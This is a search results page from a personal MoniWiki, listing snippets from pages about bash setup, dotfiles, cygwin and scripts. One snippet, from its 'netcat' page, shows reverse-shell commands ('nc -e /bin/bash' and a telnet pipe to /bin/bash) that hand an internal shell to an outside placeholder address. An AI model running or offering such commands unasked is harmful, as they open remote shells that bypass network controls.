Full text search for "bash"


Search BackLinks only
Display context of search results
Case-sensitive searching
  • BashInstallationOnOsx . . . . 17 matches
         [bash]
         from https://gimslab.tistory.com/m/entry/Install-bash-again-in-your-Mac-osx-why
         It's a very outdated version of the Bash shell on Mac OSX. maybe like GNU bash, version 3.2
         I needed full features of a recent version of bash. There are many exceptions in an old version of bash like this.
         $ brew install bash
         $ bash --version
         GNU bash, 버전 5.1.4(1)-release (x86\_64-apple-darwin19.6.0)
         I have two versions of bash from now.
         $ which -a bash
         /usr/local/bin/bash
         /bin/bash
         add new bash to the whitelist shell file /etc/shells like below
         /bin/bash
         /usr/local/bin/bash
         $ chsh -s /usr/local/bin/bash
         Good! I can get this same result with my other bash in Linux.
  • bash . . . . 9 matches
         #keywords bash-script, bash
         ["bash getopts"]
         [bash installation on osx]
         [bash scripts]
         BashStatements
         [iterate multiple args in bash]
         [.bashrc]
         [.bash_profile]
         [cygwin] 이용 window에서 [.sh 확장자 bash.exe로 연결]
  • .bashrc와.bash_profile차이점 . . . . 5 matches
         #keywords bash, linux
         [.bashrc] : [bash]이 실행될 때마다 실행됨
         [.bash_profile] : [bash]이 login shell로 쓰일 때 실행됨
  • .sh확장자Bash.exe로연결 . . . . 4 matches
         [cygwin]을 이용하여 [WindowsScripts]에서 {{{*.sh}}} 확장자 파일을 bash.exe 가 실행하도록 연결하기
         assoc .sh=bashscript
         ftype bashscript=D:\programs\cygwin\bin\bash.exe -i -c 'sh "$(cygpath -u "%1")"'
  • netcat . . . . 4 matches
         = 외부(공인ip)에서 내부(사설ip)의 bash를 사용 =
         내부(사설ip) : nc -e /bin/bash x.x.x.x 80
         = nc설치안된 내부의 bash 사용 =
         내부(사설ip) : telnet x.x.x.x 10000 | /bin/bash | telnet x.x.x.x 10001
  • .bash_profile . . . . 2 matches
         [.bashrc와 .bash_profile 차이점]
  • .bashrc . . . . 2 matches
         [.bashrc와 .bash_profile 차이점]
  • BashScript . . . . 2 matches
         #keywords bash, script
         [bash scripts]
  • BashScripts . . . . 2 matches
         [bash]
         https://github.com/gimslab/bash-scripts
  • BashStatements . . . . 2 matches
         #keywords bash, script, statements
         [bash if statements]
  • IterateMultipleArgsInBash . . . . 2 matches
         #keywords bash-script, bash
  • ReadFromStdin . . . . 2 matches
         #keywords bash-script
         #!/bin/bash
  • Ssh-add.exeOnCygwin에서Ssh-agent연결불가 . . . . 2 matches
          5788 1 5788 5788 con 1003 09:25:52 /usr/bin/bash
          4324 1 4324 4324 con 1003 10:56:18 /usr/bin/bash
  • UnixShellProgramming . . . . 2 matches
         #keywords bash-script, shell, linux, unix
         cf : [parsing parameters in bash script] [텍스트 처리 명령어], [gims_win_cmd]
         http://wiki.kldp.org/HOWTO/html/Adv-Bash-Scr-HOWTO/complexfunct.html
  • amho . . . . 2 matches
         https://github.com/gimslab/bash-snippets/blob/master/amho.sh
         #!/bin/bash
  • bash getopts . . . . 2 matches
         [bash] >
         https://mug896.github.io/bash-shell/getopts.html
  • AES . . . . 1 match
         [bash aes]
  • BashIfStatements . . . . 1 match
         #keywords bash, if statements, script
  • ExpectScript/getSpawnResult . . . . 1 match
         set os [exec bash -c {uname}]
  • FZF-CommandlineFuzzyFinder . . . . 1 match
         #keywords cli, bash
  • Google Drive Mount to Ubuntu . . . . 1 match
         #!/bin/bash
  • If명령 . . . . 1 match
         --> [bash if statements]
  • OsxTips . . . . 1 match
         [bash installation on osx]
  • ParsingParametersInBashScript . . . . 1 match
         #keywords bash-script, parameters, getopts
  • Test명령 . . . . 1 match
         {{{[}}} 와 {{{[[}}} 의 차이점 : [[http://mywiki.wooledge.org/BashFAQ/031]]
         http://wiki.bash-hackers.org/commands/classictest
  • bashrc . . . . 1 match
         [.bashrc]
  • build.sh . . . . 1 match
         bash ./gradlew clean :finance-batch:batchPackage
  • cygwin . . . . 1 match
         = [.sh 확장자 bash.exe로 연결] =
  • getip . . . . 1 match
         #keywords bash, shell script
  • moniwikicmd.sh . . . . 1 match
         #keywords bash-script
  • scp . . . . 1 match
         --> .bashrc 파일의 echo 문장을 없에든지 다음과 같이 수정
  • sonar.sh . . . . 1 match
         #keywords bash, sonar, example
  • stay . . . . 1 match
         #keyword bash, shell-program
  • surfingkeys . . . . 1 match
         my settings: https://github.com/gimslab/bash-scripts/blob/master/surfingkeys.settings
  • trash . . . . 1 match
         #keywords bash, shell, trash
  • 해피해킹 . . . . 1 match
          * 방향키와 페이지업다운, 홈, 엔드키를 생각보다 많이 사용하더라.. 내가.. 이걸 모두 오른쪽 새끼손가락을 누른상태에서 써야하니 새끼손가락이 피곤.. vi나 eclipse vrapper, bash 만 사용한다면 무관하지만 그외의 많은 툴들은 방향키를 써야하고...
Found 36 matching pages out of 1802 total pages

You can also click here to search title.

Valid XHTML 1.0! Valid CSS! powered by MoniWiki
last modified 2022-08-01 14:33:07
Processing time 0.3775 sec